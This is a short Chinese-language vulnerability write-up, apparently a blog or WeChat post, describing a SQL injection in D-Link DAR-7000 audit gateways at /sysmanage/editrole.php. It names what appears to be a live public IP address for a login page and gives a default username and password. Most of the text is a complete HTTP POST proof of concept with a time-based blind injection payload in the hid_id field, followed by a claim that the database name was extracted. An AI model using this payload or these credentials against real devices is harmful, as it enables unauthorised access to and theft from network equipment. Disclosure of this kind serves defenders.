D-LINK DAR-7000系列上网行为审计网关存在后端SQL注入漏洞。攻击者可以利用漏洞获取服务器权限或对系统造成业务影响。
官方:http: //www.dlink.com.cn/
版本:DAR-7000-40(DAR V31R02B1413C)
漏洞路径:/sysmanage/editrole.php
漏洞类型:SQL注入
漏洞危害:攻击者可利用漏洞获取数据库敏感信息
查看登录页面。
https://60.22.74.195:8443/
有一个默认帐户密码:test/admin@123
构建以下POC来判断id参数是否存在SQL注入
POST /sysmanage/editrole.php HTTP/1.1
Host: [Host值]
Cookie: PHPSESSID=bbecd470b51ebcf03793acadba87a61f
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
hid_id=(select*from(select(sleep(3)))a)
以此类推,获取数据库名nsg
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里